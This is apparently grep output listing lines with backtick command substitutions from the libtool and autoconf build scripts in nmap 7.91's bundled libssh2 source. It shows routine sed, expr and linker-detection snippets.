nmap-7.91+dfsg1/libssh2/ltmain.sh-9474-		  for potent_lib in $potential_libs; do
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-9509-	  newdeplibs=
nmap-7.91+dfsg1/libssh2/ltmain.sh:9510:	  tmp_deplibs=`$ECHO " $deplibs" | $SED 's/ -lc$//; s/ -[LR][^ ]*//g'`
nmap-7.91+dfsg1/libssh2/ltmain.sh-9511-	  if test yes = "$allow_libtool_libs_with_static_runtimes"; then
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-9513-	      # can't use Xsed below, because $i might contain '/'
nmap-7.91+dfsg1/libssh2/ltmain.sh:9514:	      tmp_deplibs=`$ECHO " $tmp_deplibs" | $SED "s|$i||"`
nmap-7.91+dfsg1/libssh2/ltmain.sh-9515-	    done
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-9539-	  # On Rhapsody replace the C library with the System framework
nmap-7.91+dfsg1/libssh2/ltmain.sh:9540:	  newdeplibs=`$ECHO " $newdeplibs" | $SED 's/ -lc / System.ltframework /'`
nmap-7.91+dfsg1/libssh2/ltmain.sh-9541-	  ;;
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-9591-	*-*-darwin*)
nmap-7.91+dfsg1/libssh2/ltmain.sh:9592:	  newdeplibs=`$ECHO " $newdeplibs" | $SED 's% \([^ $]*\).ltframework% -framework \1%g'`
nmap-7.91+dfsg1/libssh2/ltmain.sh:9593:	  new_inherited_linker_flags=`$ECHO " $new_inherited_linker_flags" | $SED 's% \([^ $]*\).ltframework% -framework \1%g'`
nmap-7.91+dfsg1/libssh2/ltmain.sh:9594:	  deplibs=`$ECHO " $deplibs" | $SED 's% \([^ $]*\).ltframework% -framework \1%g'`
nmap-7.91+dfsg1/libssh2/ltmain.sh-9595-	  ;;
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-9718-	# Use standard objects if they are pic
nmap-7.91+dfsg1/libssh2/ltmain.sh:9719:	test -z "$pic_flag" && libobjs=`$ECHO "$libobjs" | $SP2NL | $SED "$lo2o" | $NL2SP`
nmap-7.91+dfsg1/libssh2/ltmain.sh-9720-	test "X$libobjs" = "X " && libobjs=
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-10232-	  eval tmp_whole_archive_flags=\"$whole_archive_flag_spec\"
nmap-7.91+dfsg1/libssh2/ltmain.sh:10233:	  test -n "$wl" || tmp_whole_archive_flags=`$ECHO "$tmp_whole_archive_flags" | $SED 's|,| |g'`
nmap-7.91+dfsg1/libssh2/ltmain.sh-10234-	  reload_conv_objs=$reload_objs\ $tmp_whole_archive_flags
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-10247-      # Create the old-style object.
nmap-7.91+dfsg1/libssh2/ltmain.sh:10248:      reload_objs=$objs$old_deplibs' '`$ECHO "$libobjs" | $SP2NL | $SED "/\.$libext$/d; /\.lib$/d; $lo2o" | $NL2SP`' '$reload_conv_objs
nmap-7.91+dfsg1/libssh2/ltmain.sh-10249-
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-10305-	# On Rhapsody replace the C library is the System framework
nmap-7.91+dfsg1/libssh2/ltmain.sh:10306:	compile_deplibs=`$ECHO " $compile_deplibs" | $SED 's/ -lc / System.ltframework /'`
nmap-7.91+dfsg1/libssh2/ltmain.sh:10307:	finalize_deplibs=`$ECHO " $finalize_deplibs" | $SED 's/ -lc / System.ltframework /'`
nmap-7.91+dfsg1/libssh2/ltmain.sh-10308-	;;
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-10323-	# Time to change all our "foo.ltframework" stuff back to "-framework foo"
nmap-7.91+dfsg1/libssh2/ltmain.sh:10324:	compile_deplibs=`$ECHO " $compile_deplibs" | $SED 's% \([^ $]*\).ltframework% -framework \1%g'`
nmap-7.91+dfsg1/libssh2/ltmain.sh:10325:	finalize_deplibs=`$ECHO " $finalize_deplibs" | $SED 's% \([^ $]*\).ltframework% -framework \1%g'`
nmap-7.91+dfsg1/libssh2/ltmain.sh-10326-	;;
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-10401-	*-*-cygwin* | *-*-mingw* | *-*-pw32* | *-*-os2* | *-cegcc*)
nmap-7.91+dfsg1/libssh2/ltmain.sh:10402:	  testbindir=`$ECHO "$libdir" | $SED -e 's*/lib$*/bin*'`
nmap-7.91+dfsg1/libssh2/ltmain.sh-10403-	  case :$dllsearchpath: in
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-10461-	# Transform all the library objects into standard objects.
nmap-7.91+dfsg1/libssh2/ltmain.sh:10462:	compile_command=`$ECHO "$compile_command" | $SP2NL | $SED "$lo2o" | $NL2SP`
nmap-7.91+dfsg1/libssh2/ltmain.sh:10463:	finalize_command=`$ECHO "$finalize_command" | $SP2NL | $SED "$lo2o" | $NL2SP`
nmap-7.91+dfsg1/libssh2/ltmain.sh-10464-      fi
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-10489-	# Replace the output file specification.
nmap-7.91+dfsg1/libssh2/ltmain.sh:10490:	compile_command=`$ECHO "$compile_command" | $SED 's%@OUTPUT@%'"$output"'%g'`
nmap-7.91+dfsg1/libssh2/ltmain.sh-10491-	link_command=$compile_command$compile_rpath
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-10498-	  func_to_tool_file "$output"
nmap-7.91+dfsg1/libssh2/ltmain.sh:10499:	  postlink_cmds=`func_echo_all "$postlink_cmds" | $SED -e 's%@OUTPUT@%'"$output"'%g' -e 's%@TOOL_OUTPUT@%'"$func_to_tool_file_result"'%g'`
nmap-7.91+dfsg1/libssh2/ltmain.sh-10500-	  func_execute_cmds "$postlink_cmds" 'exit $?'
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-10542-	# Replace the output file specification.
nmap-7.91+dfsg1/libssh2/ltmain.sh:10543:	link_command=`$ECHO "$link_command" | $SED 's%@OUTPUT@%'"$output"'%g'`
nmap-7.91+dfsg1/libssh2/ltmain.sh-10544-	# Delete the old output file.
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-10550-	  func_to_tool_file "$output"
nmap-7.91+dfsg1/libssh2/ltmain.sh:10551:	  postlink_cmds=`func_echo_all "$postlink_cmds" | $SED -e 's%@OUTPUT@%'"$output"'%g' -e 's%@TOOL_OUTPUT@%'"$func_to_tool_file_result"'%g'`
nmap-7.91+dfsg1/libssh2/ltmain.sh-10552-	  func_execute_cmds "$postlink_cmds" 'exit $?'
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-10568-	  link_command=$finalize_var$compile_command$finalize_rpath
nmap-7.91+dfsg1/libssh2/ltmain.sh:10569:	  relink_command=`$ECHO "$compile_var$compile_command$compile_rpath" | $SED 's%@OUTPUT@%\$progdir/\$file%g'`
nmap-7.91+dfsg1/libssh2/ltmain.sh-10570-          ;;
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-10581-      # Replace the output file specification.
nmap-7.91+dfsg1/libssh2/ltmain.sh:10582:      link_command=`$ECHO "$link_command" | $SED 's%@OUTPUT@%'"$output_objdir/$outputname"'%g'`
nmap-7.91+dfsg1/libssh2/ltmain.sh-10583-
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-10590-	func_to_tool_file "$output_objdir/$outputname"
nmap-7.91+dfsg1/libssh2/ltmain.sh:10591:	postlink_cmds=`func_echo_all "$postlink_cmds" | $SED -e 's%@OUTPUT@%'"$output_objdir/$outputname"'%g' -e 's%@TOOL_OUTPUT@%'"$func_to_tool_file_result"'%g'`
nmap-7.91+dfsg1/libssh2/ltmain.sh-10592-	func_execute_cmds "$postlink_cmds" 'exit $?'
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-10611-	relink_command="(cd `pwd`; $relink_command)"
nmap-7.91+dfsg1/libssh2/ltmain.sh:10612:	relink_command=`$ECHO "$relink_command" | $SED "$sed_quote_subst"`
nmap-7.91+dfsg1/libssh2/ltmain.sh-10613-      fi
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-10857-      relink_command="(cd `pwd`; $SHELL \"$progpath\" $preserve_args --mode=relink $libtool_args @inst_prefix_dir@)"
nmap-7.91+dfsg1/libssh2/ltmain.sh:10858:      relink_command=`$ECHO "$relink_command" | $SED "$sed_quote_subst"`
nmap-7.91+dfsg1/libssh2/ltmain.sh-10859-      if test yes = "$hardcode_automatic"; then
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-10878-		func_resolve_sysroot "$deplib"
nmap-7.91+dfsg1/libssh2/ltmain.sh:10879:		eval libdir=`$SED -n -e 's/^libdir=\(.*\)$/\1/p' $func_resolve_sysroot_result`
nmap-7.91+dfsg1/libssh2/ltmain.sh-10880-		test -z "$libdir" && \
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-10904-		name=$func_basename_result
nmap-7.91+dfsg1/libssh2/ltmain.sh:10905:		eval libdir=`$SED -n -e 's/^libdir=\(.*\)$/\1/p' $lib`
nmap-7.91+dfsg1/libssh2/ltmain.sh-10906-		test -z "$libdir" && \
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-10923-		name=$func_basename_result
nmap-7.91+dfsg1/libssh2/ltmain.sh:10924:		eval libdir=`$SED -n -e 's/^libdir=\(.*\)$/\1/p' $lib`
nmap-7.91+dfsg1/libssh2/ltmain.sh-10925-		test -z "$libdir" && \
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-11242-# ### BEGIN LIBTOOL TAG CONFIG: disable-static
nmap-7.91+dfsg1/libssh2/ltmain.sh:11243:build_old_libs=`case $build_libtool_libs in yes) echo no;; *) echo yes;; esac`
nmap-7.91+dfsg1/libssh2/ltmain.sh-11244-# ### END LIBTOOL TAG CONFIG: disable-static
##############################################
nmap-7.91+dfsg1/libssh2/m4/lib-ld.m4-14-[# I'd rather use --version here, but apparently some GNU ld's only accept -v.
nmap-7.91+dfsg1/libssh2/m4/lib-ld.m4:15:case `$LD -v 2>&1 </dev/null` in
nmap-7.91+dfsg1/libssh2/m4/lib-ld.m4-16-*GNU* | *'with BFD'*)
##############################################
nmap-7.91+dfsg1/libssh2/m4/lib-ld.m4-50-    # gcc leaves a trailing carriage return which upsets mingw
nmap-7.91+dfsg1/libssh2/m4/lib-ld.m4:51:    ac_prog=`($CC -print-prog-name=ld) 2>&5 | tr -d '\015'` ;;
nmap-7.91+dfsg1/libssh2/m4/lib-ld.m4-52-  *)
nmap-7.91+dfsg1/libssh2/m4/lib-ld.m4:53:    ac_prog=`($CC -print-prog-name=ld) 2>&5` ;;
nmap-7.91+dfsg1/libssh2/m4/lib-ld.m4-54-  esac
##############################################
nmap-7.91+dfsg1/libssh2/m4/lib-ld.m4-59-      # Canonicalize the path of ld
nmap-7.91+dfsg1/libssh2/m4/lib-ld.m4:60:      ac_prog=`echo $ac_prog| sed 's%\\\\%/%g'`
nmap-7.91+dfsg1/libssh2/m4/lib-ld.m4-61-      while echo $ac_prog | grep "$re_direlt" > /dev/null 2>&1; do
nmap-7.91+dfsg1/libssh2/m4/lib-ld.m4:62:	ac_prog=`echo $ac_prog| sed "s%$re_direlt%/%"`
nmap-7.91+dfsg1/libssh2/m4/lib-ld.m4-63-      done
##############################################
nmap-7.91+dfsg1/libssh2/m4/lib-ld.m4-89-      # Break only if it was the GNU/non-GNU ld that we prefer.
nmap-7.91+dfsg1/libssh2/m4/lib-ld.m4:90:      case `"$acl_cv_path_LD" -v 2>&1 < /dev/null` in
nmap-7.91+dfsg1/libssh2/m4/lib-ld.m4-91-      *GNU* | *'with BFD'*)
##############################################
nmap-7.91+dfsg1/libssh2/m4/lib-link.m4-199-        dnl or AC_LIB_HAVE_LINKFLAGS call.
nmap-7.91+dfsg1/libssh2/m4/lib-link.m4:200:        uppername=`echo "$name" | sed -e 'y|abcdefghijklmnopqrstuvwxyz./-|ABCDEFGHIJKLMNOPQRSTUVWXYZ___|'`
nmap-7.91+dfsg1/libssh2/m4/lib-link.m4-201-        eval value=\"\$HAVE_LIB$uppername\"
##############################################
nmap-7.91+dfsg1/libssh2/m4/lib-link.m4-274-                -L*)
nmap-7.91+dfsg1/libssh2/m4/lib-link.m4:275:                  dir=`echo "X$x" | sed -e 's/^X-L//'`
nmap-7.91+dfsg1/libssh2/m4/lib-link.m4-276-                  dnl First look for a shared library.
##############################################
nmap-7.91+dfsg1/libssh2/m4/lib-link.m4-416-              */$acl_libdirstem | */$acl_libdirstem/)
nmap-7.91+dfsg1/libssh2/m4/lib-link.m4:417:                basedir=`echo "X$found_dir" | sed -e 's,^X,,' -e "s,/$acl_libdirstem/"'*$,,'`
nmap-7.91+dfsg1/libssh2/m4/lib-link.m4-418-                LIB[]NAME[]_PREFIX="$basedir"
##############################################
nmap-7.91+dfsg1/libssh2/m4/lib-link.m4-470-                  -L*)
nmap-7.91+dfsg1/libssh2/m4/lib-link.m4:471:                    additional_libdir=`echo "X$dep" | sed -e 's/^X-L//'`
nmap-7.91+dfsg1/libssh2/m4/lib-link.m4-472-                    dnl Potentially add $additional_libdir to $LIBNAME and $LTLIBNAME.
##############################################
nmap-7.91+dfsg1/libssh2/m4/lib-link.m4-520-                  -R*)
nmap-7.91+dfsg1/libssh2/m4/lib-link.m4:521:                    dir=`echo "X$dep" | sed -e 's/^X-R//'`
nmap-7.91+dfsg1/libssh2/m4/lib-link.m4-522-                    if test "$enable_rpath" != no; then
##############################################
nmap-7.91+dfsg1/libssh2/m4/lib-link.m4-550-                    dnl Handle this in the next round.
nmap-7.91+dfsg1/libssh2/m4/lib-link.m4:551:                    names_next_round="$names_next_round "`echo "X$dep" | sed -e 's/^X-l//'`
nmap-7.91+dfsg1/libssh2/m4/lib-link.m4-552-                    ;;
##############################################
nmap-7.91+dfsg1/libssh2/m4/lib-link.m4-556-                    dnl option.
nmap-7.91+dfsg1/libssh2/m4/lib-link.m4:557:                    names_next_round="$names_next_round "`echo "X$dep" | sed -e 's,^X.*/,,' -e 's,^lib,,' -e 's,\.la$,,'`
nmap-7.91+dfsg1/libssh2/m4/lib-link.m4-558-                    ;;
##############################################
nmap-7.91+dfsg1/libssh2/m4/lib-link.m4-663-            -L) next=yes ;;
nmap-7.91+dfsg1/libssh2/m4/lib-link.m4:664:            -L*) dir=`echo "X$opt" | sed -e 's,^X-L,,'`
nmap-7.91+dfsg1/libssh2/m4/lib-link.m4-665-                 dnl No need to hardcode the standard /usr/lib.
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-119-    done
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:120:    func_cc_basename_result=`$ECHO "$cc_temp" | $SED "s%.*/%%; s%^$host_alias-%%"`
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-121-}
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-437-m4_define([_LT_CONFIG_STATUS_DECLARE],
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:438:[$1='`$ECHO "$][$1" | $SED "$delay_single_quote_subst"`'])
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-439-
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-447-#
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:448:#    <var>='`$ECHO "$<var>" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-449-m4_defun([_LT_CONFIG_STATUS_DECLARATIONS],
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-557-]], lt_decl_quote_varnames); do
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:558:    case \`eval \\\\\$ECHO \\\\""\\\\\$\$var"\\\\"\` in
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-559-    *[[\\\\\\\`\\"\\\$]]*)
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:560:      eval "lt_\$var=\\\\\\"\\\`\\\$ECHO \\"\\\$\$var\\" | \\\$SED \\"\\\$sed_quote_subst\\"\\\`\\\\\\"" ## exclude from sc_prohibit_nested_quotes
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-561-      ;;
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-570-]], lt_decl_dquote_varnames); do
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:571:    case \`eval \\\\\$ECHO \\\\""\\\\\$\$var"\\\\"\` in
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-572-    *[[\\\\\\\`\\"\\\$]]*)
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:573:      eval "lt_\$var=\\\\\\"\\\`\\\$ECHO \\"\\\$\$var\\" | \\\$SED -e \\"\\\$double_quote_subst\\" -e \\"\\\$sed_quote_subst\\" -e \\"\\\$delay_variable_subst\\"\\\`\\\\\\"" ## exclude from sc_prohibit_nested_quotes
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-574-      ;;
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-1111-  if test yes = "$lt_cv_ld_force_load"; then
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:1112:    _LT_TAGVAR(whole_archive_flag_spec, $1)='`for conv in $convenience\"\"; do test  -n \"$conv\" && new_convenience=\"$new_convenience $wl-force_load,$conv\"; done; func_echo_all \"$new_convenience\"`'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-1113-    m4_case([$1], [F77], [_LT_TAGVAR(compiler_needs_object, $1)=yes],
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-1164-      }]'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:1165:  _LT_TAGVAR([lt_cv_aix_libpath_], [$1])=`dump -H conftest$ac_exeext 2>/dev/null | $SED -n -e "$lt_aix_libpath_sed"`
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-1166-  # Check for a 64-bit object if we didn't find anything.
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-1167-  if test -z "$_LT_TAGVAR([lt_cv_aix_libpath_], [$1])"; then
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:1168:    _LT_TAGVAR([lt_cv_aix_libpath_], [$1])=`dump -HX64 conftest$ac_exeext 2>/dev/null | $SED -n -e "$lt_aix_libpath_sed"`
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-1169-  fi],[])
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-1200-if test "X`( print -r -- -n ) 2>/dev/null`" = X-n && \
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:1201:   test "X`print -r -- $ECHO 2>/dev/null`" = "X$ECHO"; then
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-1202-  ECHO='print -r --'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:1203:elif test "X`printf %s $ECHO 2>/dev/null`" = "X$ECHO"; then
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-1204-  ECHO='printf %s\n'
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-1235-    PATH=/empty FPATH=/empty; export PATH FPATH
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:1236:    test "X`printf %s $ECHO`" = "X$ECHO" \
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:1237:      || test "X`print -r -- $ECHO`" = "X$ECHO" )])])
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-1238-
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-1259-   if test yes = "$GCC"; then
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:1260:     lt_sysroot=`$CC --print-sysroot 2>/dev/null`
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-1261-   fi
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-1263- /*)
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:1264:   lt_sysroot=`echo "$with_sysroot" | sed -e "$sed_quote_subst"`
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-1265-   ;; #(
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-1293-  if AC_TRY_EVAL(ac_compile); then
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:1294:    case `/usr/bin/file conftest.$ac_objext` in
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-1295-      *ELF-32*)
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-1310-    if test yes = "$lt_cv_prog_gnu_ld"; then
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:1311:      case `/usr/bin/file conftest.$ac_objext` in
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-1312-	*32-bit*)
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-1322-    else
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:1323:      case `/usr/bin/file conftest.$ac_objext` in
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-1324-	*32-bit*)
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-1344-    emul=elf
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:1345:    case `/usr/bin/file conftest.$ac_objext` in
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-1346-      *32-bit*)
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-1352-    esac
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:1353:    case `/usr/bin/file conftest.$ac_objext` in
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-1354-      *MSB*)
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-1360-    esac
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:1361:    case `/usr/bin/file conftest.$ac_objext` in
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-1362-      *N32*)
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-1725-    # And add a safety zone
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:1726:    lt_cv_sys_max_cmd_len=`expr $lt_cv_sys_max_cmd_len \/ 4`
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:1727:    lt_cv_sys_max_cmd_len=`expr $lt_cv_sys_max_cmd_len \* 3`
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-1728-    ;;
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-1758-    if test -n "$kargmax"; then
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:1759:      lt_cv_sys_max_cmd_len=`echo $kargmax | sed 's/.*[[	 ]]//'`
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-1760-    else
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-1767-       test undefined != "$lt_cv_sys_max_cmd_len"; then
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:1768:      lt_cv_sys_max_cmd_len=`expr $lt_cv_sys_max_cmd_len \/ 4`
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:1769:      lt_cv_sys_max_cmd_len=`expr $lt_cv_sys_max_cmd_len \* 3`
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-1770-    else
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-1779-      # we can't tell.
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:1780:      while { test X`env echo "$teststring$teststring" 2>/dev/null` \
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-1781-	         = "X$teststring$teststring"; } >/dev/null 2>&1 &&
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-1783-      do
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:1784:        i=`expr $i + 1`
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-1785-        teststring=$teststring$teststring
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-1787-      # Only check the string length outside the loop.
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:1788:      lt_cv_sys_max_cmd_len=`expr "X$teststring" : ".*" 2>&1`
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-1789-      teststring=
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-1792-      # linker.  It appears as though 1/2 is a usable value.
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:1793:      lt_cv_sys_max_cmd_len=`expr $lt_cv_sys_max_cmd_len \/ 2`
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-1794-    fi
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2258-    *:)
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:2259:        eval @S|@1=\"`$ECHO @S|@2 | $SED 's/:/ /g'` \@S|@@S|@1\"
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2260-        ;;
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2261-    x:*)
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:2262:        eval @S|@1=\"\@S|@@S|@1 `$ECHO @S|@2 | $SED 's/:/ /g'`\"
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2263-        ;;
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2264-    *::*)
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:2265:        eval @S|@1=\"\@S|@@S|@1\ `$ECHO @S|@2 | $SED -e 's/.*:://' -e 's/:/ /g'`\"
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:2266:        eval @S|@1=\"`$ECHO @S|@2 | $SED -e 's/::.*//' -e 's/:/ /g'`\ \@S|@@S|@1\"
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2267-        ;;
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2268-    *)
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:2269:        eval @S|@1=\"`$ECHO @S|@2 | $SED 's/:/ /g'`\"
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2270-        ;;
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2298-  esac
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:2299:  lt_search_path_spec=`$CC -print-search-dirs | awk $lt_awk_arg | $SED -e "s/^libraries://" -e $lt_sed_strip_eq`
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2300-  case $lt_search_path_spec in
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2305-    # okay in the real world where ";" in dirpaths is itself problematic.
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:2306:    lt_search_path_spec=`$ECHO "$lt_search_path_spec" | $SED 's/;/ /g'`
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2307-    ;;
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2308-  *)
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:2309:    lt_search_path_spec=`$ECHO "$lt_search_path_spec" | $SED "s/$PATH_SEPARATOR/ /g"`
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2310-    ;;
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2314-  lt_tmp_lt_search_path_spec=
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:2315:  lt_multi_os_dir=/`$CC $CPPFLAGS $CFLAGS $LDFLAGS -print-multi-os-directory 2>/dev/null`
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2316-  # ...but if some path component already ends with the multilib dir we assume
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2356-  esac
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:2357:  sys_lib_search_path_spec=`$ECHO "$lt_search_path_spec" | $lt_NL2SP`
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2358-else
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2497-    # Create ${libname}_ixlibrary.a entries in /sys/libs.
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:2498:    finish_eval='for lib in `ls $libdir/*.ixlibrary 2>/dev/null`; do libname=`func_echo_all "$lib" | $SED '\''s%^.*/\([[^/]]*\)\.ixlibrary$%\1%'\''`; $RM /sys/libs/${libname}_ixlibrary.a; $show "cd /sys/libs && $LN_S $lib ${libname}_ixlibrary.a"; cd /sys/libs && $LN_S $lib ${libname}_ixlibrary.a || exit 1; done'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2499-    ;;
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2533-    # DLL is installed to $(libdir)/../bin by postinstall_cmds
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:2534:    postinstall_cmds='base_file=`basename \$file`~
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:2535:      dlpath=`$SHELL 2>&1 -c '\''. $dir/'\''\$base_file'\''i; echo \$dlname'\''`~
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:2536:      dldir=$destdir/`dirname \$dlpath`~
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2537-      test -d \$dldir || mkdir -p \$dldir~
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2542-      fi'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:2543:    postuninstall_cmds='dldll=`$SHELL 2>&1 -c '\''. $file; echo \$dlname'\''`~
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2544-      dlpath=$dir/\$dldll~
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2550-      # Cygwin DLLs use 'cyg' prefix rather than 'lib'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:2551:      soname_spec='`echo $libname | sed -e 's/^lib/cyg/'``echo $release | $SED -e 's/[[.]]/-/g'`$versuffix$shared_ext'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2552-m4_if([$1], [],[
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2556-      # MinGW DLLs use traditional 'lib' prefix
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:2557:      soname_spec='$libname`echo $release | $SED -e 's/[[.]]/-/g'`$versuffix$shared_ext'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2558-      ;;
##############################################
